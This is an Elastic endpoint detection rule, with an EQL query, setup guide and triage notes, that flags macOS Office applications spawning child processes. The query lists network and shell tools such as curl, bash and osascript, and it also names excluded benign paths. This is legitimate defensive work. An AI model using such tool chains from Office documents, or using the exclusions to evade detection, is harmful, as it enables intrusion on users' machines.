Suspicious macOS MS Office Child Process

  1[metadata]
  2creation_date = "2021/01/04"
  3integration = ["endpoint"]
  4maturity = "production"
  5updated_date = "2025/02/04"
  6
  7[rule]
  8author = ["Elastic"]
  9description = """
 10Identifies suspicious child processes of frequently targeted Microsoft Office applications (Word, PowerPoint, and
 11Excel). These child processes are often launched during exploitation of Office applications or by documents with
 12malicious macros.
 13"""
 14from = "now-9m"
 15index = ["logs-endpoint.events.process*"]
 16language = "eql"
 17license = "Elastic License v2"
 18name = "Suspicious macOS MS Office Child Process"
 19references = ["https://blog.malwarebytes.com/cybercrime/2017/02/microsoft-office-macro-malware-targets-macs/"]
 20risk_score = 47
 21rule_id = "66da12b1-ac83-40eb-814c-07ed1d82b7b9"
 22setup = """## Setup
 23
 24This rule requires data coming in from Elastic Defend.
 25
 26### Elastic Defend Integration Setup
 27Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.
 28
 29#### Prerequisite Requirements:
 30- Fleet is required for Elastic Defend.
 31- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).
 32
 33#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:
 34- Go to the Kibana home page and click "Add integrations".
 35- In the query bar, search for "Elastic Defend" and select the integration to see more details about it.
 36- Click "Add Elastic Defend".
 37- Configure the integration name and optionally add a description.
 38- Select the type of environment you want to protect, for MacOS it is recommended to select "Traditional Endpoints".
 39- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).
 40- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions"
 41- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead.
 42For more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).
 43- Click "Save and Continue".
 44- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts.
 45For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 46"""
 47severity = "medium"
 48tags = [
 49    "Domain: Endpoint",
 50    "OS: macOS",
 51    "Use Case: Threat Detection",
 52    "Tactic: Initial Access",
 53    "Data Source: Elastic Defend",
 54    "Resources: Investigation Guide",
 55]
 56timestamp_override = "event.ingested"
 57type = "eql"
 58
 59query = '''
 60process where event.action == "exec" and host.os.type == "macos" and
 61    process.parent.name: (
 62      "Microsoft Word",
 63      "Microsoft Outlook",
 64      "Microsoft Excel",
 65      "Microsoft PowerPoint",
 66      "Microsoft OneNote"
 67    ) and
 68  process.name : (
 69    "curl",
 70    "nscurl",
 71    "bash",
 72    "sh",
 73    "osascript",
 74    "python*",
 75    "perl*",
 76    "mktemp",
 77    "chmod",
 78    "php",
 79    "nohup",
 80    "openssl",
 81    "plutil",
 82    "PlistBuddy",
 83    "xattr",
 84    "mktemp",
 85    "sqlite3",
 86    "funzip",
 87    "popen"
 88  ) and
 89
 90  // Filter FPs related to product version discovery and Office error reporting behavior
 91  not process.args:
 92    (
 93      "ProductVersion",
 94      "hw.model",
 95      "ioreg",
 96      "ProductName",
 97      "ProductUserVisibleVersion",
 98      "ProductBuildVersion",
 99      "/Library/Application Support/Microsoft/MERP*/Microsoft Error Reporting.app/Contents/MacOS/Microsoft Error Reporting",
100      "open -a Safari *",
101      "defaults read *",
102      "sysctl hw.model*",
103      "ioreg -d2 -c IOPlatformExpertDevice *",
104      "ps aux | grep 'ToDesk_Desktop' | grep -v grep",
105      "PIPE=\"$CFFIXED_USER_HOME/.zoteroIntegrationPipe*"
106    ) and
107
108   not process.parent.executable :
109        (
110          "/Applications/ToDesk.app/Contents/MacOS/ToDesk_Service",
111          "/usr/local/Privacy-i/PISupervisor",
112          "/Library/Addigy/lan-cache",
113          "/Library/Elastic/Agent/*",
114          "/opt/jc/bin/jumpcloud-agent",
115          "/usr/sbin/networksetup"
116        ) and
117   not (process.name : "sh" and process.command_line : "*$CFFIXED_USER_HOME/.zoteroIntegrationPipe*") and
118
119   not process.Ext.effective_parent.executable : (
120        "/Applications/ToDesk.app/Contents/MacOS/ToDesk_Service",
121        "/usr/local/Privacy-i/PISupervisor",
122        "/Library/Addigy/auditor",
123        "/Library/Elastic/Agent/*",
124        "/opt/jc/bin/jumpcloud-agent",
125        "/usr/sbin/networksetup"
126      )
127'''
128note = """## Triage and analysis
129
130> **Disclaimer**:
131> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
132
133### Investigating Suspicious macOS MS Office Child Process
134
135Microsoft Office applications on macOS can be exploited by adversaries to execute malicious child processes, often through malicious macros or document exploits. These child processes may include scripting languages or utilities that can be leveraged for unauthorized actions. The detection rule identifies such suspicious activity by monitoring for unexpected child processes spawned by Office apps, while filtering out known benign behaviors and false positives, thus helping to pinpoint potential threats.
136
137### Possible investigation steps
138
139- Review the parent process name and executable path to confirm if the Office application is legitimate and expected on the host.
140- Examine the child process name and command line arguments to identify any potentially malicious or unexpected behavior, such as the use of scripting languages or network utilities like curl or nscurl.
141- Check the process arguments for any indicators of compromise or suspicious patterns that are not filtered out by the rule, such as unexpected network connections or file modifications.
142- Investigate the effective parent executable path to ensure it is not associated with known benign applications or services that are excluded by the rule.
143- Correlate the alert with any recent phishing attempts or suspicious email activity that might have led to the execution of malicious macros or document exploits.
144- Analyze the host's recent activity and system logs to identify any other anomalies or related alerts that could provide additional context or evidence of compromise.
145
146### False positive analysis
147
148- Product version discovery commands can trigger false positives. Exclude processes with arguments like "ProductVersion" and "ProductBuildVersion" to reduce noise.
149- Office error reporting may cause alerts. Exclude paths related to Microsoft Error Reporting to prevent unnecessary alerts.
150- Network setup and management tools such as "/usr/sbin/networksetup" can be benign. Exclude these executables if they are part of regular system operations.
151- Third-party applications like ToDesk and JumpCloud Agent might be flagged. Exclude their executables if they are verified as safe and part of normal operations.
152- Zotero integration can cause false positives with shell processes. Exclude specific command lines involving "CFFIXED_USER_HOME/.zoteroIntegrationPipe" to avoid these alerts.
153
154### Response and remediation
155
156- Immediately isolate the affected macOS device from the network to prevent further malicious activity or lateral movement.
157- Terminate any suspicious child processes identified by the alert, such as those involving scripting languages or utilities like curl, bash, or osascript.
158- Conduct a thorough review of the parent Microsoft Office application and associated documents to identify and remove any malicious macros or document exploits.
159- Restore the affected system from a known good backup if malicious activity has compromised system integrity or data.
160- Update all Microsoft Office applications to the latest version to patch any known vulnerabilities that could be exploited by similar threats.
161- Implement application whitelisting to restrict the execution of unauthorized scripts and utilities, reducing the risk of exploitation through Office applications.
162- Escalate the incident to the security operations team for further investigation and to assess the potential impact on other systems within the network."""
163
164
165[[rule.threat]]
166framework = "MITRE ATT&CK"
167[[rule.threat.technique]]
168id = "T1566"
169name = "Phishing"
170reference = "https://attack.mitre.org/techniques/T1566/"
171[[rule.threat.technique.subtechnique]]
172id = "T1566.001"
173name = "Spearphishing Attachment"
174reference = "https://attack.mitre.org/techniques/T1566/001/"
175
176
177
178[rule.threat.tactic]
179id = "TA0001"
180name = "Initial Access"
181reference = "https://attack.mitre.org/tactics/TA0001/"